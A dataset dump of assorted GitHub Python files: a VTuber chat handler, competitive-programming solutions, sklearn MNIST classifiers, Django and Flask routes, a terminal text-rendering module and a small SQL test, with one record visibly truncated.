self.prohibitions_handle(data['username']):\n return\n \n if self.integral_handle(\"entrance\", data):\n return\n\n # 合并字符串末尾连续的* 主要针对获取不到用户名的情况\n data['username'] = My_handle.common.merge_consecutive_asterisks(data['username'])\n # 删除用户名中的特殊字符\n data['username'] = My_handle.common.replace_special_characters(data['username'], \"!!@#¥$%^&*_-+/——=()()【】}|{:;<>~`\\\\\")\n\n # logging.debug(f\"[{data['username']}]: {data['content']}\")\n \n if False == self.thanks_config[\"entrance_enable\"]:\n return\n\n resp_content = self.thanks_config[\"entrance_copy\"].format(username=data[\"username\"])\n\n message = {\n \"type\": \"entrance\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": data['username'],\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n except Exception as e:\n logging.error(traceback.format_exc())\n\n\n # 关注处理\n def follow_handle(self, data):\n try:\n # 合并字符串末尾连续的* 主要针对获取不到用户名的情况\n data['username'] = My_handle.common.merge_consecutive_asterisks(data['username'])\n # 删除用户名中的特殊字符\n data['username'] = My_handle.common.replace_special_characters(data['username'], \"!!@#¥$%^&*_-+/——=()()【】}|{:;<>~`\\\\\")\n\n # 违禁处理\n if self.prohibitions_handle(data['username']):\n return\n\n # logging.debug(f\"[{data['username']}]: {data['content']}\")\n \n if False == self.thanks_config[\"follow_enable\"]:\n return\n\n resp_content = self.thanks_config[\"follow_copy\"].format(username=data[\"username\"])\n\n message = {\n \"type\": \"follow\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": data['username'],\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n except Exception as e:\n logging.error(traceback.format_exc())\n\n # 定时处理\n def schedule_handle(self, data):\n try:\n content = data[\"content\"]\n\n message = {\n \"type\": \"entrance\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": data['username'],\n \"content\": content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n except Exception as e:\n logging.error(traceback.format_exc())\n\n\n \"\"\"\n 数据丢弃部分\n 增加新的处理事件时,需要进行这块部分的内容追加\n \"\"\"\n def process_data(self, data, timer_flag):\n with self.data_lock:\n if timer_flag not in self.timers or not self.timers[timer_flag].is_alive():\n self.timers[timer_flag] = threading.Timer(self.get_interval(timer_flag), self.process_last_data, args=(timer_flag,))\n self.timers[timer_flag].start()\n\n # self.timers[timer_flag].last_data = data\n if hasattr(self.timers[timer_flag], 'last_data'):\n self.timers[timer_flag].last_data.append(data)\n # 这里需要注意配置命名!!!\n if len(self.timers[timer_flag].last_data) > int(My_handle.config.get(\"filter\", timer_flag + \"_forget_reserve_num\")):\n self.timers[timer_flag].last_data.pop(0)\n else:\n self.timers[timer_flag].last_data = [data]\n\n def process_last_data(self, timer_flag):\n with self.data_lock:\n timer = self.timers.get(timer_flag)\n if timer and timer.last_data is not None and timer.last_data != []:\n logging.debug(f\"预处理定时器触发 type={timer_flag},data={timer.last_data}\")\n\n if timer_flag == \"comment\":\n for data in timer.last_data:\n 
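# replay each buffered event through the same handler used for live messages\n                        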
self.comment_handle(data)\n elif timer_flag == \"gift\":\n for data in timer.last_data:\n self.gift_handle(data)\n #self.gift_handle(timer.last_data)\n elif timer_flag == \"entrance\":\n for data in timer.last_data:\n self.entrance_handle(data)\n #self.entrance_handle(timer.last_data)\n elif timer_flag == \"follow\":\n for data in timer.last_data:\n self.follow_handle(data)\n elif timer_flag == \"talk\":\n # 聊天暂时共用弹幕处理逻辑\n for data in timer.last_data:\n self.comment_handle(data)\n #self.comment_handle(timer.last_data)\n elif timer_flag == \"schedule\":\n # 定时任务处理\n for data in timer.last_data:\n self.schedule_handle(data)\n #self.schedule_handle(timer.last_data)\n\n # 清空数据\n timer.last_data = []\n\n def get_interval(self, timer_flag):\n # 根据标志定义不同计时器的间隔\n intervals = {\n \"comment\": My_handle.config.get(\"filter\", \"comment_forget_duration\"),\n \"gift\": My_handle.config.get(\"filter\", \"gift_forget_duration\"),\n \"entrance\": My_handle.config.get(\"filter\", \"entrance_forget_duration\"),\n \"follow\": My_handle.config.get(\"filter\", \"follow_forget_duration\"),\n \"talk\": My_handle.config.get(\"filter\", \"talk_forget_duration\"),\n \"schedule\": My_handle.config.get(\"filter\", \"schedule_forget_duration\")\n # 根据需要添加更多计时器及其间隔,记得添加config.json中的配置项\n }\n\n # 默认间隔为0.1秒\n return intervals.get(timer_flag, 0.1)\n","repo_name":"Jacobs12/EWVtuber","sub_path":"Tools/my_handle.py","file_name":"my_handle.py","file_ext":"py","file_size_in_byte":83850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"9578604264","text":"import math\nk=input(\"enter the number of cycle:\")\nl=int(k)\nw=0\nlist=[]\nwhile w exponent:\n break\n print(S)\n toc()\n exit()\n","repo_name":"data-flux/project-euler","sub_path":"projecteuler063.py","file_name":"projecteuler063.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73645435982","text":"n, k = map(int, input().split())\np = [int(i) - 1 for i in input().split()]\nc = [int(i) for i in input().split()]\n\nchecked = [False] * n\n\nans = -10 ** 10\nfor i in range(n):\n if checked[i]:\n continue\n loop = []\n nxt = i\n while not checked[nxt]:\n checked[nxt] = True\n loop.append(c[nxt])\n nxt = p[nxt]\n\n L = len(loop)\n\n for start in range(L):\n s = 0\n dist = 0\n for end in range(start+1, start+L):\n dist += 1\n end %= L\n s += loop[end]\n ans = max(ans, s + max(0, sum(loop) * (k - dist) // L))\n\nprint(ans)\n","repo_name":"snhr-1019/competitive-programming","sub_path":"AtCoder/abc175/d/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29428184200","text":"import colorlog\nfrom colorlog import ColoredFormatter\n\nhandler = colorlog.StreamHandler() # type: ignore\n\nformatter = ColoredFormatter(\n \"%(log_color)s%(levelname)-8s%(reset)s %(blue)s%(message)s\",\n datefmt=None,\n reset=True,\n log_colors={\n \"DEBUG\": \"cyan\",\n \"INFO\": \"green\",\n \"WARNING\": \"yellow\",\n \"ERROR\": \"red\",\n \"CRITICAL\": \"red,bg_white\",\n },\n secondary_log_colors={},\n style=\"%\",\n)\n\n\nlogger = colorlog.getLogger(__name__)\nlogger.addHandler(handler)\n\nhandler.setFormatter(\n colorlog.ColoredFormatter(\n \"%(log_color)s%(levelname)-8s%(reset)s %(white)s%(message)s\",\n datefmt=None,\n reset=True,\n log_colors={\n \"DEBUG\": \"red\",\n \"INFO\": \"green\",\n \"WARNING\": 
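# this formatter is the one actually attached to the handler; the module-level formatter defined earlier is never used\n            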
\"yellow\",\n \"ERROR\": \"red\",\n \"CRITICAL\": \"red,bg_white\",\n },\n secondary_log_colors={},\n style=\"%\",\n )\n)\nlogger.setLevel(\"DEBUG\")\n","repo_name":"mohseneptune/todos-fastapi","sub_path":"src/infrastructure/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"27465772712","text":"class Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n anagrams = collections.defaultdict(list)\n \n for word in strs:\n sorted_word = ''.join(sorted(word))\n anagrams[sorted_word] += [word]\n \n \n return list(anagrams.values())\n \n \n \n\n \n \n ","repo_name":"jongheonleee/Leetcode","sub_path":"49-group-anagrams/49-group-anagrams.py","file_name":"49-group-anagrams.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"41196197082","text":"import os\n\nos.chdir('C:/Users/Asus')\n\nfinput = open(\"TESTINGSIR.txt\",\"r\") \noutput = open(\"pro.txt\",\"w\")\n\ncount = 0\nfor line in finput :\n count = count+1\n output.write (\"{:2d} {}\".format(count,line))","repo_name":"Andrean2305/Tugas-Sir-Jude-AandP","sub_path":"input file from another file.py","file_name":"input file from another file.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"15374825273","text":"# -*- coding: utf-8 -*-\r\n\r\n#import sys\r\n#import os\r\nimport time\r\nfrom sklearn import metrics\r\nimport numpy as np\r\nimport pickle\r\nimport kreadmnist \r\n\r\n\r\n\r\n'''\r\n classifiers = {'NB':naive_bayes_classifier, #快\r\n 'KNN':knn_classifier, #慢\r\n 'LR':logistic_regression_classifier, #慢\r\n 'RF':random_forest_classifier, #快\r\n 'DT':decision_tree_classifier, #快\r\n 'SVM':svm_classifier,#慢\r\n 'GBDT':gradient_boosting_classifier, #慢\r\n 'AB':AdaBoost_classifier,\r\n 'NN':Neural_Network_classifier\r\n }\r\n'''\r\n \r\n# Multinomial Naive Bayes Classifier朴素贝叶斯\r\ndef naive_bayes_classifier(train_x, train_y):\r\n from sklearn.naive_bayes import MultinomialNB\r\n model = MultinomialNB(alpha=0.01)\r\n model.fit(train_x, train_y)\r\n return model\r\n \r\n \r\n# KNN Classifier K近邻\r\n#class sklearn.neighbors.KNeighborsClassifier(n_neighbors=5, \r\n#weights=’uniform’, algorithm=’auto’, leaf_size=30, p=2, \r\n#metric=’minkowski’, metric_params=None, n_jobs=1, **kwargs)\r\n#优点\r\n#1.简单,易于理解,易于实现,无需估计参数,无需训练;\r\n#2. 
适合对稀有事件进行分类;\r\n#3.特别适合于多分类问题(multi-modal,对象具有多个类别标签), kNN比SVM的表现要好。\r\n#缺点\r\n#数据量大时不可行,计算量大等等\r\ndef knn_classifier(train_x, train_y):\r\n from sklearn.neighbors import KNeighborsClassifier\r\n model = KNeighborsClassifier()\r\n model.fit(train_x, train_y)\r\n return model\r\n \r\n \r\n# Logistic Regression Classifier 逻辑回归\r\ndef logistic_regression_classifier(train_x, train_y):\r\n from sklearn.linear_model import LogisticRegression\r\n model = LogisticRegression(penalty='l2')\r\n model.fit(train_x, train_y)\r\n return model\r\n \r\n \r\n# Random Forest Classifier 随机森林\r\ndef random_forest_classifier(train_x, train_y):\r\n from sklearn.ensemble import RandomForestClassifier\r\n model = RandomForestClassifier(n_estimators=100)\r\n model.fit(train_x, train_y)\r\n return model\r\n \r\n \r\n# Decision Tree Classifier 决策树\r\ndef decision_tree_classifier(train_x, train_y):\r\n from sklearn import tree\r\n model = tree.DecisionTreeClassifier()\r\n model.fit(train_x, train_y)\r\n return model\r\n \r\n \r\n# GBDT(Gradient Boosting Decision Tree) Classifier 迭代决策树\r\ndef gradient_boosting_classifier(train_x, train_y):\r\n from sklearn.ensemble import GradientBoostingClassifier\r\n model = GradientBoostingClassifier(n_estimators=200)\r\n model.fit(train_x, train_y)\r\n return model\r\n\r\n\r\n\r\n# AdaBoost \r\ndef AdaBoost_classifier(train_x,train_y):\r\n from sklearn.ensemble import AdaBoostClassifier\r\n model=AdaBoostClassifier(n_estimators=200)\r\n model.fit(train_x,train_y)\r\n return model\r\n \r\n# SVM Classifier SVM,支持向量机\r\n#class sklearn.svm.SVC(C=1.0, kernel=’rbf’, degree=3, gamma=’auto’,\r\n#coef0=0.0, shrinking=True, probability=False,tol=0.001, \r\n#cache_size=200, class_weight=None, verbose=False, max_iter=-1, \r\n#decision_function_shape=’ovr’, random_state=None)[source]\r\n#优点\r\n#二分类效果相当好\r\n#缺点\r\n#数据量大时不可行,计算量大,算法复杂,多分类表现一般等等\r\ndef svm_classifier(train_x, train_y):\r\n from sklearn.svm import SVC\r\n model = SVC(kernel='rbf', probability=True)\r\n model.fit(train_x, train_y)\r\n return model\r\n\r\n# Neural_Network MLP\r\ndef Neural_Network_classifier(train_x,train_y):\r\n from sklearn.neural_network import MLPClassifier\r\n model=MLPClassifier()\r\n model.fit(train_x,train_y)\r\n return model\r\n\r\n \r\nif __name__ == '__main__':\r\n thresh = 0.5\r\n model_save_file = None #如果想要保存训练好的模型,就加个名字上去\r\n model_save = {}\r\n '''\r\n 全部一起计算会花销大量的时间,所以建议修改后,单个计算,单个记录\r\n 如下\r\n '''\r\n test_classifiers = ['RF']\r\n classifiers = {\r\n 'RF':random_forest_classifier\r\n }\r\n #计算时间\r\n# test_classifiers = ['NB', 'KNN', 'LR', 'RF', 'DT', 'SVM', 'GBDT','AB']\r\n# classifiers = {'NB':naive_bayes_classifier, #快\r\n# 'KNN':knn_classifier, #慢\r\n# 'LR':logistic_regression_classifier, #慢\r\n# 'RF':random_forest_classifier, #快\r\n# 'DT':decision_tree_classifier, #快\r\n# 'SVM':svm_classifier,#慢\r\n# 'GBDT':gradient_boosting_classifier, #慢\r\n# 'AB':AdaBoost_classifier,\r\n# 'NN':Neural_Network_classifier\r\n# }\r\n print('正在读取训练数据集和测试数据集......')\r\n train_x, train_y, test_x, test_y = kreadmnist.read_data()\r\n \r\n# #PCA\r\n# from sklearn.decomposition import PCA\r\n# estimator=PCA(n_components=700)\r\n# \r\n# train_x=estimator.fit_transform(train_x)\r\n# test_x=estimator.fit_transform(test_x)\r\n \r\n #以下是截取一小部分的数据进行测试,检测算法是否运行\r\n# train_x= train_x[0:1000]\r\n# train_y= train_y[0:1000]\r\n# test_x= test_x[0:50]\r\n# test_y =test_y[0:50]\r\n# \r\n print(train_x.shape)\r\n #训练集合测试集的数量,数据向量的维度\r\n num_train, num_feat = train_x.shape\r\n num_test, num_feat = test_x.shape\r\n is_binary_class = 
(len(np.unique(train_y)) == 2)\r\n print('******************** 数据的信息 *********************')\r\n #training data: %d, #testing_data: %d, dimension:\r\n print('#训练数据集: %d, #测试数据集: %d, 数据的维度: %d' % (num_train, num_test, num_feat))\r\n \r\n for classifier in test_classifiers:\r\n print('******************* %s ********************' % classifier)\r\n start_time = time.time()\r\n model = classifiers[classifier](train_x, train_y)\r\n print('training took %fs!' % (time.time() - start_time))\r\n \r\n predict = model.predict(test_x)\r\n if model_save_file != None:\r\n model_save[classifier] = model\r\n if is_binary_class:\r\n precision = metrics.precision_score(test_y, predict)\r\n recall = metrics.recall_score(test_y, predict)\r\n print('precision: %.2f%%, recall: %.2f%%' % (100 * precision, 100 * recall))\r\n \r\n '''----------------------------------------'''\r\n '''下面的循环主要作用是看第几个有错误,同时看进行检验的过程'''\r\n# for i in range(len(predict)):\r\n# if predict[i]==test_y[i]:\r\n# print(\"第{}个正确\".format(i))\r\n# else:\r\n# print(\"第{}个错误\".format(i))\r\n '''---------------------------------------'''\r\n \r\n ''' accuracy是sklearn自带的方法 '''\r\n accuracy = metrics.accuracy_score(test_y, predict)\r\n print('{} accuracy: {}%'.format(classifier,100 * accuracy))\r\n #如果model_save_file没有设置,下面语句将不会执行,即训练出来的模型不保存\r\n if model_save_file != None:\r\n pickle.dump(model_save, open(model_save_file, 'wb'))\r\n\r\n\r\n","repo_name":"AlphaKong/MLtest","sub_path":"mnistclassifier.py","file_name":"mnistclassifier.py","file_ext":"py","file_size_in_byte":7163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29506977079","text":"from sklearn.externals import joblib\r\nimport matplotlib.image as mimage\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom docx import Document\r\n\r\nfilename = r'C:\\Users\\HRUNN\\Desktop\\DevanagariHandwrittenCharacterDataset\\First programs\\englishdigitclass.pkl'\r\nclassifier = joblib.load(filename)\r\ndata_test = np.zeros((1, 196))\r\ncount = 0\r\ndocument = Document()\r\nwhile True:\r\n path = r'C:\\Users\\HRUNN\\Desktop\\DevanagariHandwrittenCharacterDataset\\1.png'\r\n im = mimage.imread(path)\r\n im = im[:, :, 0]\r\n plt.imshow(im)\r\n plt.show()\r\n for i in range(0, 26, 2):\r\n for j in range(0, 26, 2):\r\n data_test[0, count] = im[i, j] + im[i + 1, j] + im[i, j + 1] + im[i + 1, j + 1]\r\n count = count + 1\r\n count = 0\r\n output = classifier.predict(data_test)\r\n document.add_paragraph(str(output))\r\n document.save('English.docx')\r\n plt.subplot(2, 1, 1)\r\n plt.imshow(im)\r\n plt.subplot(2, 1, 2)\r\n path2 = r'C:\\Users\\HRUNN\\Desktop\\DevanagariHandwrittenCharacterDataset\\training\\%d\\(1).png' % output\r\n im1 = mimage.imread(path2)\r\n plt.imshow(im1)\r\n plt.show()\r\n","repo_name":"srinivas-kini/OCR-neural-nets","sub_path":"HRUNN/Latin/latin_digits.py","file_name":"latin_digits.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"38587814516","text":"\"\"\"oauau URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. 
Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.contrib.sitemaps.views import sitemap\nfrom django.views.generic import TemplateView\n\nfrom .newsletter.views import WorkbookView, WorkbookConfirmationView, \\\n LandingPageView, LaunchConfirmationView\nfrom .sitemap import OauauSitemap\n\n\nsitemaps = {\n 'static': OauauSitemap,\n}\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', LandingPageView.as_view(), name='landing_page'),\n url(r'^googlec22a1c650e0dd9ea.html$',\n TemplateView.as_view(template_name='googlec22a1c650e0dd9ea.html')),\n url(r'^sitemap\\.xml$', sitemap, {'sitemaps': sitemaps},\n name='django.contrib.sitemaps.views.sitemap'),\n url(r'^confirmacao/$', LaunchConfirmationView.as_view(),\n name='launch_confirmation'),\n url(r'^livro-de-atividades-vogais/$',\n WorkbookView.as_view(), name='workbook'),\n url(r'^livro-de-atividades-vogais/download/$',\n WorkbookConfirmationView.as_view(), name='workbook_confirmation'),\n]\n","repo_name":"rogerhil/oauau","sub_path":"src/oauau/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"18631589527","text":"# TODO retrieve attributes of any (x, y) coordinates\n# TODO retrieve attributes of closest existing line (by y coordinate)\n# TODO use ulen and unicode string splitting\n\nimport collections\nfrom typing import Any, Deque, Iterator, List, Optional, Set, Tuple\n\nfrom .markup import AT, Attributes\n\n__all__ = [\"Line\", \"AttributedLines\"]\n\nLine = Tuple[Attributes, AT]\n\nclass AttributedLines:\n \"\"\"\n AttributedLines is a list of lines of AttributedText that maintains a\n vertical offset.\n\n When rendering a tree of messages, the RenderedMessage-s are drawn line by\n line to an AttributedLines. The AttributedLines is then displayed in an\n AttributedLinesWidget.\n\n Multiple AttributedLines can be concatenated, keeping either the first or\n the second AttributedLines's offset.\n \"\"\"\n\n def __init__(self, lines: Optional[List[Line]] = None) -> None:\n self.upper_offset = 0\n self._lines: Deque[Line] = collections.deque(lines or [])\n\n def __iter__(self) -> Iterator[Line]:\n return self._lines.__iter__()\n\n def __len__(self) -> int:\n return len(self._lines)\n\n @property\n def lower_offset(self) -> int:\n # When there's one element in the list, the lower and upper offsets are\n # the same. From that follows that in an empty list, the lower offset\n # must be smaller than the upper offset.\n return self.upper_offset + (len(self) - 1)\n\n @lower_offset.setter\n def lower_offset(self, lower_offset: int) -> None:\n self.upper_offset = lower_offset - (len(self) - 1)\n\n # Modifying functions\n\n def append_above(self,\n attributes: Attributes,\n text: AT,\n ) -> None:\n \"\"\"\n Append a line above all already existing lines. The existing lines'\n offsets do not change.\n \"\"\"\n\n self._lines.appendleft((attributes, text))\n self.upper_offset -= 1\n\n def append_below(self,\n attributes: Attributes,\n text: AT,\n ) -> None:\n \"\"\"\n Append a line below all already existing lines. 
The existing lines'\n offsets do not change.\n \"\"\"\n\n self._lines.append((attributes, text))\n # lower offset does not need to be modified since it's calculated based\n # on the upper offset\n\n def extend_above(self, lines: \"AttributedLines\") -> None:\n \"\"\"\n Prepend an AttributedLines, ignoring its offsets and using the current\n AttributedLines's offsets instead.\n \"\"\"\n\n self._lines.extendleft(reversed(lines._lines))\n self.upper_offset -= len(lines)\n\n def extend_below(self, lines: \"AttributedLines\") -> None:\n \"\"\"\n Append an AttributedLines, ignoring its offsets and using the current\n AttributedLines's offsets instead.\n \"\"\"\n\n self._lines.extend(lines._lines)\n # lower offset does not need to be modified since it's calculated based\n # on the upper offset\n\n # Non-modifying functions\n\n def between(self, start_offset: int, end_offset: int) -> \"AttributedLines\":\n \"\"\"\n Returns a new AttributedLines object containing only the lines between\n (and including) start_offset and end_offset.\n \"\"\"\n\n lines = []\n\n for i, line in enumerate(self):\n line_offset = self.upper_offset + i\n if start_offset <= line_offset <= end_offset:\n lines.append(line)\n\n attr_lines = AttributedLines(lines)\n attr_lines.upper_offset = max(start_offset, self.upper_offset)\n attr_lines.lower_offset = min(end_offset, self.lower_offset)\n return attr_lines\n\n def to_size(self, start_offset: int, end_offset: int) -> \"AttributedLines\":\n \"\"\"\n Same as between(), but fills the AttributedLines with empty lines where\n necessary so that the new upper_offset is the start_offset and the new\n lower_offset is the end_offset.\n \"\"\"\n\n between = self.between(start_offset, end_offset)\n\n while between.upper_offset > start_offset:\n between.append_above({}, AT())\n\n while between.lower_offset < end_offset:\n between.append_below({}, AT())\n\n return between\n\n @staticmethod\n def render_line(\n line: Line,\n width: int,\n horizontal_offset: int,\n offset_char: str = \" \",\n overlap_char: str = \"…\",\n ) -> AT:\n \"\"\"\n Renders a single line to a specified width with a specified horizontal\n offset, applying all line-wide attributes to the result. 
The length of\n the resulting line is exactly the specified width.\n\n The offset_char is used to pad the line if it is shorter than required.\n\n The overlap_char is used to mark the lines that extend beyond the right\n edge of the widget.\n \"\"\"\n\n attributes, text = line\n # column to the right is reserved for the overlap char\n text_width = width - 1\n\n start_offset = horizontal_offset\n end_offset = start_offset + text_width\n\n result: AT = AT()\n\n if start_offset < 0:\n pad_length = min(text_width, -start_offset)\n result += AT(offset_char * pad_length)\n\n if end_offset < 0:\n pass # the text should not be displayed at all\n elif end_offset < len(text):\n if start_offset > 0:\n result += text[start_offset:end_offset]\n else:\n result += text[:end_offset]\n else:\n if start_offset > 0:\n result += text[start_offset:]\n else:\n result += text\n\n if end_offset > len(text):\n pad_length = min(text_width, end_offset - len(text))\n result += AT(offset_char * pad_length)\n\n if end_offset < len(text):\n result += AT(overlap_char)\n else:\n result += AT(offset_char)\n\n for k, v in attributes.items():\n result = result.set(k, v)\n\n return result\n\n def render_lines(self,\n width: int,\n height: int,\n horizontal_offset: int,\n ) -> List[AT]:\n \"\"\"\n Renders all lines individually.\n \"\"\"\n\n lines = []\n\n for line in self.to_size(0, height - 1):\n lines.append(self.render_line(line, width, horizontal_offset))\n\n return lines\n\n def render(self,\n width: int,\n height: int,\n horizontal_offset: int,\n ) -> AT:\n \"\"\"\n Renders all lines and combines them into a single AttributedText by\n joining them with a newline.\n \"\"\"\n\n lines = self.render_lines(width, height,\n horizontal_offset=horizontal_offset)\n return AT(\"\\n\").join(lines)\n\n def all_values(self, attribute: str) -> Set[Any]:\n values = set()\n\n for attributes, _ in self._lines:\n if attribute in attributes:\n values.add(attributes.get(attribute))\n\n return values\n","repo_name":"Garmelon/bowl","sub_path":"bowl/attributed_lines.py","file_name":"attributed_lines.py","file_ext":"py","file_size_in_byte":7066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"21724688718","text":"# Dependencies\n\nimport datetime as dt\nimport numpy as np\nimport pandas as pd\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify\n\n# Database Setup\nengine = create_engine(\"sqlite:///hawaii.sqlite\")\n\n# Reflect an existing database into a new model\nBase = automap_base()\n\n# Reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save reference to the table\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n# Create session\nsession = Session(engine)\n\n# Flask setup\napp = Flask(__name__)\n\n# Flask Routes\n@app.route(\"/\")\ndef welcome():\n\n return(\n\n f\"Available Routes:
<br/><br/>\"\n        f\"/api/v1.0/precipitation<br/><br/>\"\n        f\"/api/v1.0/stations<br/><br/>\"\n        f\"/api/v1.0/tobs<br/><br/>\"\n        f\"/api/v1.0/yyyy-mm-dd/<br/>\"\n        f\"(Dates range from 2010-01-01 to 2017-08-23).<br/><br/>\" \n        f\"/api/v1.0/yyyy-mm-dd/yyyy-mm-dd/<br/>\"\n        f\"(Dates range from 2010-01-01 to 2017-08-23).<br/><br/>\"\n    )\n\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n    \n    # Query precipitation\n    results = session.query(Measurement.date, Measurement.prcp).\\\n        filter(Measurement.date >= \"2016-08-24\", Measurement.date <= \"2017-08-23\").\\\n        all()\n\n    prcp_data = [results]\n\n    return jsonify(prcp_data)\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n\n    # Query stations\n    results = session.query(Station.name, Station.station).all()\n\n    station_data = []\n    for result in results:\n        station_dic = {}\n        station_dic['name'] = result[0]\n        station_dic['station'] = result[1]\n        station_data.append(station_dic)\n    \n    return jsonify(station_data)\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n    \n    # Query temperatures\n    results = session.query(Measurement.date, Measurement.tobs).\\\n        filter(Measurement.date >= \"2016-08-24\", Measurement.date <= \"2017-08-23\").\\\n        all()\n\n    tobs_data = []\n    for result in results:\n        tobs_dic = {}\n        tobs_dic[\"Date\"] = result[0]\n        tobs_dic[\"Temperature\"] = int(result[1])\n        tobs_data.append(tobs_dic)\n\n    return jsonify(tobs_data)\n\n@app.route('/api/v1.0/<date>/')\ndef any_date(date):\n    \n    results = session.query(func.avg(Measurement.tobs), func.max(Measurement.tobs), func.min(Measurement.tobs)).\\\n        filter(Measurement.date >= date).all()\n\n    data_list = []\n    for result in results:\n        data_dic = {}\n        data_dic['Average Temperature'] = float(result[0])\n        data_dic['Highest Temperature'] = float(result[1])\n        data_dic['Lowest Temperature'] = float(result[2])\n        data_list.append(data_dic)\n\n    return jsonify(data_list)\n\n@app.route('/api/v1.0/<start>/<end>/')\ndef date_range(start, end):\n\n    results = session.query(func.avg(Measurement.tobs), func.max(Measurement.tobs), func.min(Measurement.tobs)).\\\n        filter(Measurement.date >= start, Measurement.date <= end).all()\n\n    date_range = []\n    for result in results:\n        date_dic= {}\n        date_dic[\"Start Date\"] = start\n        date_dic[\"End Date\"] = end\n        date_dic[\"Average Temperature\"] = float(result[0])\n        date_dic[\"Highest Temperature\"] = float(result[1])\n        date_dic[\"Lowest Temperature\"] = float(result[2])\n        date_range.append(date_dic)\n    \n    return jsonify(date_range)\n\n\nif __name__ == '__main__':\n    app.run(debug=True)","repo_name":"myun3378/Surfs-Up","sub_path":"climate_app.py","file_name":"climate_app.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"846635697","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nimport os\nimport sys\n\nimport sqlite3\n\nfrom jk_sql import *\n\n\n\n\n\ndb = DBManager.createSQLiteMemoryDB()\ntable = db.createTable(DBTableDef(\"mytable\", [\n\tDBColDef(\"rowidxxx\", EnumDBColType.PK, False, EnumDBIndexType.NONE),\n\tDBColDef(\"mybool\", EnumDBColType.BOOL, True, EnumDBIndexType.NONE),\n\tDBColDef(\"myint\", EnumDBColType.INT32, True, EnumDBIndexType.NONE),\n\tDBColDef(\"myfloat\", EnumDBColType.DOUBLE, True, EnumDBIndexType.NONE),\n\tDBColDef(\"mystr\", EnumDBColType.STR256, True, EnumDBIndexType.NONE),\n\tDBColDef(\"myblob\", EnumDBColType.BLOB, True, EnumDBIndexType.NONE),\n\tDBColDef(\"myclob\", EnumDBColType.CLOB, True, EnumDBIndexType.NONE),\n]))\n\n# insert\nprint(\"---- verify the insert\")\n\nfor n in range(0, 3):\n\ttable.addRow({\n\t\t\"mybool\": True,\n\t\t\"myint\": 123 + n,\n\t\t\"myfloat\": 1.23,\n\t\t\"mystr\": \"abc\" + str(n),\n\t\t\"myblob\": b\"\\x00\\x01\\x02\\x03\",\n\t\t\"myclob\": \"Lorem ipsum\",\n\t})\n\nprint(\"---- verify the insert\")\n\nrows = 
